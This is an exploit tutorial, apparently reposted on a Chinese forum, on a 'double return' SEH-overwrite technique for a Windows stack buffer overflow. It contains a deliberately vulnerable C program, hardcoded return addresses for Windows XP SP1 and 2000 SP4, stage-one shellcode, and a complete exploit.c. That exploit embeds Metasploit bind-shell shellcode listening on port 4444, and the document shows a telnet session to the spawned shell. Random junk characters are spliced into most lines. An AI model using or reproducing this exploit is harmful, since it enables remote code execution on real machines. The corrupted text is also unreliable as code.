The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.) T2 X* l: L- x% l1 N2 p
6 p/ {* e+ i" [: B
[Buf] <- Shellcode5 O& f. y9 [* y! a1 y6 k5 ?
[Return Address] <- jmp register (for Windows XP sp1) - [6 [& n8 `* Y7 d$ O( F[Various Stack Data] <- Junk" h6 j& n/ S _" h
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward$ r) f7 G1 \' ~+ o
[SE Handler] <- jmp register (for Win2k sp4) 6 |8 Y% Q+ Z5 a1 j+ p3 @[Stage1 Shellcode] <- stage1 shellcode for win2k+ `, b% i0 J- k1 K
2 J) l- G4 I, `5 ? L- |+ d
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses) p" F& }, U; R' W& }. M8 W
# {+ Z6 Q% c6 W, ^" ^
Necessary Tools: : M+ m. h; C- C0 W7 a/ C; G" ~- OllyDBG" Y5 `8 X! w6 g4 o' z+ V8 N7 G
- C/C++ Compiler ! R9 b8 t$ t$ Y0 |- nasm# s4 o# c; E1 J
- Sac / n) l: Z# X5 I" ~; b % e9 Q* f% b2 c* V! HVulnerable Code: % j+ t. p! y" C7 o# t//lamebuf.c. M+ k/ O( e7 l$ i3 c3 T
#include<stdio.h>% A; f2 L( ^, m" P* g
#include<string.h> ) k; w2 H7 j( X) U9 y" M#include<windows.h>* `% O2 d) C( T8 M3 A5 D
int main(int argc,char *argv[]){3 @7 k; I$ b: G- k. ^3 I( S
' _: |+ m& r4 x* g( v0 H4 x
char buf[512]; / \3 V6 o7 }; K1 B9 ]* achar buf1[1024]; // <- simulate a stack; l1 w7 h- A1 I
//DebugBreak(); 7 w4 t8 G5 H- J. Z$ `2 mif (argc != 2){ return -1; }( x1 @9 Z) L0 R- r \( a
( y+ c& Q& } @9 ?7 \9 y' w+ E8 y, p
strcpy(buf,argv[1]); + V" I3 K L, c0 C8 Greturn 0x0;0 ~$ o4 P2 h. ^9 @1 v
} % W P7 K$ ]) u! O 4 j: L* U1 d- u. c. E0 yGetting Started:; K0 G. v9 }) ~3 {
Before writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:: e+ s w& I# Q' ~
1 n1 n7 @. y; K5 x- P9 o
EAX 00000000 ! q- a$ K6 Y$ ~% ?2 A* hECX 00321404, k5 B" S/ X9 I. U0 w) F
EDX 00414141- i& b, i% G+ d/ b- N' W
EBX 7FFDF0006 C5 U$ Z: b) b$ ?
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ; e1 z8 _ U. Q# H6 t% OEBP 41414141" s# F) d) S( L* ]: d; s
ESI 77D4595F/ w# |. l) S8 m* H( d) g8 F
EDI 77F59037 ntdll.77F59037 ! ~* p% r( J. H! j% ~4 ?EIP 41414141 V. T" ?+ g' l7 X
; \$ Y6 p* e3 {1 p. c+ ?4 \8 m) N/ i
Lets take a look at the stack and see what happened to the default exception handler:+ ~1 ?0 s& _( E0 A
0x0012FFB0 41414141 Pointer to next SEH Record' s+ B, K( t9 h+ V2 ~. o
0x0012FFB4 41414141 SE Handler# U. W. r# J; {0 p5 _6 R
4 \# F: m, R( g3 dWe successfully overwrote the return address and the default exception handler. 7 \7 }" N3 b/ y* [, f: t% |0 o* d- t$ o9 |. i
Primary Return Address (Windows XP SP1 EN): q1 x& C9 z7 x1 P9 t$ Q
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be: 3 i9 n2 P( ]6 z$ K1 R! W6 A"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"7 k! L% N$ t) z6 C
' p$ X/ Y! w8 v6 j: y$ u) D
Secondary Return Address (Windows 2000 SP4 EN): 8 I, n h, ?2 j/ a4 PThe secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be: % |& N/ T% A% s0 s F% E) P"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1" ; p" K B C$ J) e " {4 ~" Q5 }( u$ J% B! iProof Of Concept:! ?! d2 Q& D" a7 R8 U- y
// exploit.c" @- A1 ?6 \* D i: w% \" t+ c
// Tal zeltzer - [Double Return] // $ {' H6 L7 V9 i6 E3 Q* s: b4 M9 Y1 Q* V. `- D9 b/ P
#include<stdio.h>/ `# U$ `4 A2 a% {; C! O
#include<string.h> ; }& v, x3 ^8 x D- |' H#include<windows.h> : d3 v1 m# G$ x6 X! \. x( ]' Q$ p' n& i- r+ e, p& |5 x, P
#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp 6 S3 ?2 b4 f9 S' x G8 d#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx * m! Q" ~$ A# o " F& i- Z B3 k1 {// Stage1 For WinXP Sp1 English % Y0 d& S9 F% W4 I0 z/ Q! _unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"; 8 X/ e* @7 [" r i+ [; x( c0 x) d2 X- x
// Stage1 For Win2k Sp4 English 6 x: O- i, o3 O# G+ |5 Yunsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"; # I. W9 o, ], S4 b* F3 B2 J6 H5 X5 J5 z* ^/ d% J) R
// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com ! v. B: e, g1 T" T+ ]# z1 uunsigned char shellcode[] = h+ R% V6 q. B. k4 O* k6 i5 I( q
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85" 7 C; I9 X& K0 f# x"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19" , q" S- w/ U$ ?: h"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05" % I" l, W$ V# K: e7 G, ~: q"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"! `% l$ N' c" h# |+ i! g$ e
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74" 0 O- M: L& [; q( Y' c& E( `"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15": \7 _* `9 T5 B, n- [
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14" 2 {/ g. o+ t+ S# M+ p4 {: U"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"# ^! E* L) z, y* X6 I
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce" 0 ^! @3 s1 R& H& p3 F"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"6 b, G" M5 \( \& _+ x( k
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"6 A; d. v! l6 H% Q3 F M" \
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"- ?6 x/ H1 b! u, N
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6" 9 a/ v0 b4 c- r9 u6 e- z"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16" 9 u0 O/ r3 s; I- J9 i"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"9 s( ^+ F9 S/ |* J) k
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"7 O3 D9 ]( A7 `8 y) t/ K
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"- p ` ?0 w# b( T& e1 `7 Z
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"8 Q# B1 X' s6 M
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8" & j- s5 i" m7 ^+ I# ~"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e" ; i, J5 h( h) ^ `! `" |"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f" % k- M/ E6 t' X7 ~"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27" - W5 h3 E) O5 ]2 @" V"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2" - `: F$ u; M a0 H+ P"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a" 0 M0 p8 b! s, g1 H"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98"; 4 H: {! ~- W; e * p, l# k0 Z0 c 1 Z8 c; j) b) ^8 mint main(int argc,char *argv[]){ ) ~7 T s q4 Q5 E# U! i3 ]; \7 z( R+ D
char *bufExe[3]; 8 {. u" T4 n, |1 ], m: lchar buf[2048];; _# a# H+ s3 ~
bufExe[0] = "lamebuf.exe";1 ]' _8 d' R% g+ r# M. \+ o: D
bufExe[2] = NULL;8 f; \( F5 V! k1 O6 V2 }
) O! M" Q4 `3 ^' O( m" ?' bmemset(buf,0x0,sizeof(buf)); - m2 ~+ Q- x( u$ i* U; wmemset(buf,0x90,1652);( F e0 Q$ h+ W4 D% Y. @
memcpy(&buf[24],shellcode,sizeof(shellcode)-1); # g* V- R6 T3 b I5 T1 V' l: |4 D3 Q
memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode" m9 \ W" L6 j: e$ j2 `' \# e
memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode( z9 o5 V$ u6 Q Y* W9 {, ^
6 \$ W3 r7 k d3 b+ D$ Z" f+ [
*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en9 _# r- G0 E# {4 t: h
*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code9 `3 i7 J: d5 m, d, W1 P
*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en & ]* o( [6 u4 t8 S( t6 Y; C, G! O7 {. e. i) i" H. l0 c# v
' h+ ?6 T* B$ I, ]: AbufExe[1] = buf;/ E8 Q0 R" K4 W
//Execute the vulnerable application/ B+ x' B+ o( g: `: M) a. u7 X$ V
execve(bufExe[0],bufExe,NULL); % b+ o- P/ u+ O5 q L& Y X5 `" `5 i; a8 J! G: `8 K
return 0x0; m8 f) \3 r0 Q9 Z, d
} 9 ]) i/ ^% J) z! s2 N4 n) \3 K; t% y( R
Exploit under Windows XP SP1: . I1 P* ~4 n" P" _( q' `C:\>exploit 4 G2 _3 P) o- {% `% \C:\>0 V7 M. O3 g/ D- J
C:\>telnet 127.0.0.1 44440 V8 j z& i& u4 g
. O d( {/ T. F4 N% E$ b3 a0 f8 T
Microsoft Windows XP [Version 5.1.2600]7 N# h. g& b V8 E' ?" J
(C) Copyright 1985-2001 Microsoft Corp.! l( m$ u; m h: Y
2 r# b/ S( G9 ~1 D: q3 j" gC:\>9 O8 t7 M. Q3 w2 n
IP卡
狗仔卡
发表于 2004-11-19 10:39
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
